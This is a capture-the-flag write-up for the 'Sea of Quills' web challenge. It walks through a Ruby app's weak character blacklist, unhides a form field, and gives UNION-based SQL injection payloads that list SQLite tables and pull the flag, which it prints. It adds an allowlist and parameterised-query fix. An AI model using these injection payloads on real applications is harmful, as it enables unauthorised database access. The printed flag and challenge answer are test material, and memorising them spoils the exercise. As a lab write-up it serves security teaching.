# Sea of Quills

## Description

Come check out our [finest selection of quills](https://seaofquills.2021.chall.actf.co/)!

[app.rb](app.rb)

## Solution

First of all, let's analyze the code; it has three interesting parts:

Some characters are blacklisted:

```ruby
blacklist = ["-", "/", ";", "'", "\""]

blacklist.each { |word|
  if cols.include? word
    return "beep boop sqli detected!"
  end
}
```

The fields `lim` and `off` must be numeric:

```ruby
if !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
  return "bad, no quills for you!"
end
```

There is also a `cols` field, which is interpolated straight into the query string without any escaping:

```ruby
@row = db.execute("select %s from quills limit %s offset %s" % [cols, lim, off])
```

Given this information, we probably need to perform SQL injection through the `cols` field.
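As an added example (not code from the challenge's `app.rb`), here is why the blacklist above lets an injected `cols` value through, next to an allowlist check that only accepts known column names; the column names `name` and `url` are assumed for the `quills` table.

```ruby
# Added example, not from the challenge. Demonstrates the blacklist check
# from the writeup and an allowlist-based alternative for the same input.

BLACKLIST = ["-", "/", ";", "'", "\""].freeze

# Mirrors the challenge filter: input is accepted unless it contains one of
# the blacklisted substrings. Returns true when the input would be accepted.
def blacklist_accepts?(cols)
  BLACKLIST.none? { |word| cols.include?(word) }
end

# Allowlist alternative. ASSUMPTION: the quills table has these columns.
ALLOWED_COLS = %w[name url].freeze

# Returns the requested column names, or nil if any of them is unknown.
def parse_cols(cols)
  names = cols.split(",").map(&:strip)
  return nil if names.empty?
  return nil unless names.all? { |n| ALLOWED_COLS.include?(n) }
  names
end

# Builds the query with validated identifiers and bound limit/offset values.
# lim/off are anchored with \A and \z (whole string), since ^ and $ in Ruby
# regexes match at line boundaries rather than string boundaries.
def build_query(cols, lim, off)
  names = parse_cols(cols)
  return nil if names.nil?
  return nil unless /\A[0-9]+\z/.match?(lim) && /\A[0-9]+\z/.match?(off)
  sql = "select #{names.join(', ')} from quills limit ? offset ?"
  [sql, [Integer(lim, 10), Integer(off, 10)]]
end

if __FILE__ == $PROGRAM_NAME
  payload = "name FROM sqlite_master UNION SELECT url" # value used in the writeup
  puts "blacklist accepts payload: #{blacklist_accepts?(payload)}"
  puts "allowlist accepts payload: #{!parse_cols(payload).nil?}"
  p build_query("url", "100", "0")
end
```

Run with `ruby` to see the blacklist accept the writeup's payload while the allowlist rejects it.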

On the `/quills` page the `cols` field is not visible, but by inspecting and editing the HTML we can remove the hidden attribute from it.

![](img1.png)
![](img2.png)

Now we can start with the SQL injection (using `lim=100` and `off=0`).

First things first, we need to find out where the flag is stored, and we can do that by listing which tables are present in the DB:

```SQL
name FROM sqlite_master UNION SELECT url
```

![](img3.png)

There is a `flagtable`, so let's try to get the flag now:

```SQL
flag FROM flagtable UNION SELECT url
```

![](img4.png)

#### **FLAG >>** `actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}`

Original writeup (https://github.com/K1nd4SUS/CTF-Writeups/tree/main/%C3%A5ngstromCTF_2021/Sea%20of%20Quills).